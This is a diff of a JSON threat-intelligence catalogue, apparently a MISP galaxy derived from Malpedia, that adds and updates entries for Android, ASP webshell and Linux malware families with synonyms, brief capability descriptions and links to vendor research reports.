"https://blog.talosintelligence.com/2019/10/gustuffv2.html", "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", - "https://www.group-ib.com/media/gustuff/" + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.group-ib.com/media/gustuff/", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" ], "synonyms": [], "type": [] @@ -481,6 +983,49 @@ "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f", "value": "Gustuff" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain", + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf", + "https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "HARDRAIN (Android)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw", + "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5ae490bd-84ca-434f-ab34-b87bd38e4523", + "value": "HawkShaw" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox", + "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0185f9f6-018e-4eb5-a214-d810cb759a38", + "value": "HenBox" + }, { "description": "", "meta": { @@ -494,6 +1039,52 @@ "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", "value": "HeroRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad", + "https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users", + "https://twitter.com/LukasStefanko/status/1136568939239137280", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://securelist.com/mobile-malware-evolution-2019/96280/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "171c97ca-6b61-426d-8f72-c099528625e9", + "value": "HiddenAd" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra", + "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ae25953d-cf7c-4304-9ea2-2ea1498ea035", + "value": "Hydra" + }, + { + "description": "Android variant of IPStorm (InterPlanetary Storm).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm", + "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", + "https://blog.barracuda.com/2020/10/01/threat-spotlight-new-interplanetary-storm-variant-iot/" + ], + "synonyms": [ + "InterPlanetary Storm" + ], + "type": [] + }, + "uuid": "dc0c8824-64ac-4ab2-a0e4-955a14ecc59c", + "value": "IPStorm (Android)" + }, { "description": "", "meta": { @@ -520,11 +1111,29 @@ "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", "value": "JadeRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker", + "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451", + "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", + "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", + "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aa2ad8f4-3c46-4f16-994b-2a79c7481cac", + "value": "Joker" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], @@ -551,27 +1160,14 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ksremote", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/" ], "synonyms": [], "type": [] }, - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus (Android)" - }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" - ], - "synonyms": [], - "type": [] - }, - "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", - "value": "Lazarus ELF Backdoor" + "uuid": "196d51bf-cf97-455d-b997-fc3e377f2188", + "value": "KSREMOTE" }, { "description": "", @@ -591,6 +1187,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" ], "synonyms": [], @@ -612,13 +1209,26 @@ "uuid": "1785a4dd-4044-4405-91c2-efb722801867", "value": "LuckyCat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mandrake", + "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0f587654-7f70-43be-9f1f-95e3a2cc2014", + "value": "Mandrake" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", - "https://www.clientsidedetection.com/marcher.html", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" ], "synonyms": [ @@ -643,6 +1253,81 @@ "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", "value": "MazarBot" }, + { + "description": "According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa", + "https://twitter.com/ThreatFabric/status/1285144962695340032" + ], + "synonyms": [ + "Gorgona" + ], + "type": [] + }, + "uuid": "f155e529-dbea-4e4d-9df3-518401191c82", + "value": "Medusa (Android)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter", + "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe", + "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12", + "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52", + "value": "Meterpreter (Android)" + }, + { + "description": "Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks.\r\nAccording to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle", + "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "739d6d22-b187-4754-9098-22625ea612cc", + "value": "Monokle" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao", + "https://securelist.com/roaming-mantis-part-v/96250/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf", + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" + ], + "synonyms": [ + "Shaoye", + "XLoader" + ], + "type": [] + }, + "uuid": "41a9408d-7020-4988-af2c-51baf4d20763", + "value": "MoqHao" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mudwater", + "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9a8a5dd0-c86e-40d1-bc94-51070447c907", + "value": "Mudwater" + }, { "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { @@ -661,6 +1346,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" ], @@ -670,6 +1356,51 @@ "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", "value": "OmniRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.oscorp", + "https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8d383260-102f-46da-8cc6-7659cbbd9452", + "value": "Oscorp" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat", + "https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b0f56103-1771-4e01-9ed7-44149e39ce93", + "value": "PackChat" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance", + "https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf", + "https://securelist.com/apt-phantomlance/96772/" + ], + "synonyms": [ + "PWNDROID1" + ], + "type": [] + }, + "uuid": "a73375a5-3384-4515-8538-b598d225586d", + "value": "PhantomLance" + }, { "description": "", "meta": { @@ -724,6 +1455,19 @@ "uuid": "661471fe-2cb6-4b83-9deb-43225192a849", "value": "Premier RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rana", + "https://blog.reversinglabs.com/blog/rana-android-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "65a8e406-b535-4c0a-bc6d-d1bec3c55623", + "value": "Rana" + }, { "description": "", "meta": { @@ -769,6 +1513,19 @@ "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Android)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.riltok", + "https://securelist.com/mobile-banker-riltok/91374/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d7b347f8-77a5-4197-b818-f3af504da2c1", + "value": "Riltok" + }, { "description": "", "meta": { @@ -783,6 +1540,19 @@ "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", "value": "Roaming Mantis" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rogue", + "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4b53480a-8006-4af7-8e4e-cc8727c62648", + "value": "Rogue" + }, { "description": "", "meta": { @@ -810,13 +1580,25 @@ "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65", "value": "Sauron Locker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.silkbean", + "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00ab3d3b-dbbf-40de-b3d8-a3466704a1a7", + "value": "SilkBean" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", - "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", - "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" + "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" ], "synonyms": [], "type": [] @@ -845,7 +1627,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", - "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/", + "https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/" ], "synonyms": [], "type": [] @@ -853,6 +1636,20 @@ "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", "value": "Slocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent", + "https://blog.alyac.co.kr/2128", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ee42986c-e736-4092-a2f9-2931a02c688d", + "value": "SmsAgent" + }, { "description": "", "meta": { @@ -879,12 +1676,43 @@ "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", "value": "SpyBanker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spyc23", + "https://www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8fb4910f-e645-4465-a202-a20835416c87", + "value": "SpyC23" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", + "https://twitter.com/malwrhunterteam/status/1250412485808717826", + "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1dfb554-4c17-4d4c-ac48-604c48d8ab0b", + "value": "SpyMax" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan", + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" ], "synonyms": [], "type": [] @@ -923,7 +1751,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", - "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" + "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] @@ -949,6 +1778,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat", + "https://www.secureworks.com/research/threat-profiles/platinum-terminal", "https://twitter.com/LukasStefanko/status/1118066622512738304" ], "synonyms": [ @@ -985,6 +1815,19 @@ "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", "value": "TemptingCedar Spyware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.thiefbot", + "https://business.xunison.com/thiefbot-a-new-android-banking-trojan-targeting-turkish-banking-users/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5863d2eb-920d-4263-8c4b-7a16d410ff89", + "value": "ThiefBot" + }, { "description": "", "meta": { @@ -1020,11 +1863,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", + "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", - "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html" + "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/" ], "synonyms": [], "type": [] @@ -1033,11 +1879,10 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", - "https://labs.bitdefender.com/wp-content/uploads/downloads/triout-the-malware-framework-for-android-that-packs-potent-spyware-capabilities/" + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout" ], "synonyms": [], "type": [] @@ -1049,8 +1894,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", - "https://twitter.com/illegalFawn/status/826775250583035904" + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001" ], "synonyms": [], "type": [] @@ -1070,6 +1914,51 @@ "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", "value": "Unidentified APK 002" }, + { + "description": "According to Check Point Research, this is a RAT that is disguised as a set of dating apps like \"GrixyApp\", \"ZatuApp\", \"Catch&See\", including dedicated websites to conceal their malicious purpose.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_004", + "https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "55626b63-4b9a-468e-92ae-4b09b303d0ed", + "value": "Unidentified APK 004" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005", + "https://community.riskiq.com/article/6f60db72", + "https://twitter.com/voodoodahl1/status/1267571622732578816", + "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", + "https://s.tencent.com/research/report/951.html", + "https://blog.talosintelligence.com/2020/10/donot-firestarter.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b", + "value": "Unidentified APK 005" + }, + { + "description": "Related to the micropsia windows malware and also sometimes named micropsia.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vamp", + "https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/" + ], + "synonyms": [ + "android.micropsia" + ], + "type": [] + }, + "uuid": "1ad5b462-1b0d-4c2f-901d-ead6c9f227bc", + "value": "vamp" + }, { "description": "", "meta": { @@ -1098,6 +1987,33 @@ "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", "value": "WireX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "994c7bb3-ba40-41bb-89b3-f05996924b10", + "value": "WolfRAT" + }, + { + "description": "According to Avira, this is a banking trojan targeting Japan.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba", + "https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40a5d526-ef9f-4ddf-a326-6f33dceeeebc", + "value": "Wroba" + }, { "description": "", "meta": { @@ -1118,6 +2034,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", + "https://securelist.com/roaming-mantis-part-v/96250/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" ], "synonyms": [], @@ -1126,6 +2043,19 @@ "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", "value": "XLoader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy", + "https://twitter.com/malwrhunterteam/status/1249768400806653952" + ], + "synonyms": [], + "type": [] + }, + "uuid": "57600f52-b55f-49c7-9c0c-de10b2d23370", + "value": "XploitSPY" + }, { "description": "", "meta": { @@ -1170,8 +2100,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", + "https://securelist.com/whos-who-in-the-zoo/85394/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", - "https://securelist.com/whos-who-in-the-zoo/85394" + "https://www.secureworks.com/research/threat-profiles/cobalt-juno", + "https://securelist.com/whos-who-in-the-zoo/85394", + "https://securelist.com/apt-trends-report-q2-2019/91897/" ], "synonyms": [], "type": [] @@ -1197,17 +2130,26 @@ "value": "Ztorg" }, { - "description": "", + "description": "According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.\r\n\r\nThe secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", - "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", + "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", - "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/" + "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.youtube.com/watch?v=GjquFKa4afU", + "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf" ], "synonyms": [ - "HyperShell" + "HighShell", + "HyperShell", + "Minion", + "SEASHARPEE" ], "type": [] }, @@ -1226,6 +2168,107 @@ "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222", "value": "Unidentified ASP 001 (Webshell)" }, + { + "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor", + "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd2d7040-edc4-4985-b708-b206b08cc1fe", + "value": "ACBackdoor (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://twitter.com/IntezerLabs/status/1326880812344676352" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5d04aac3-fdf5-4922-9976-3a5a75e96e1a", + "value": "AgeLocker" + }, + { + "description": "AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop", + "https://blog.malwaremustdie.org/2019/09/mmd-0064-2019-linuxairdropbot.html" + ], + "synonyms": [ + "CloudBot" + ], + "type": [] + }, + "uuid": "e91fcb82-e788-44cb-be5d-73b9601b9533", + "value": "AirDropBot" + }, + { + "description": "Honeypot-aware variant of Mirai.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru", + "https://insights.oem.avira.com/new-mirai-variant-aisuru-detects-cowrie-opensource-honeypots/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e288425b-40f0-441e-977f-5f1264ed61b6", + "value": "Aisuru" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b88dc3ec-d94c-4e6e-a846-5d07130df550", + "value": "Anchor_DNS" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel", + "https://www.secureworks.com/research/threat-profiles/bronze-olive", + "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" + ], + "synonyms": [ + "Ghost RAT" + ], + "type": [] + }, + "uuid": "6cb47609-b03e-43d9-a4c7-8342f1011f3b", + "value": "ANGRYREBEL" + }, + { + "description": "Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.azazel", + "https://github.com/chokepoint/azazel" + ], + "synonyms": [], + "type": [] + }, + "uuid": "37374572-3346-4c00-abc9-9f6883c8866e", + "value": "azazel" + }, { "description": "", "meta": { 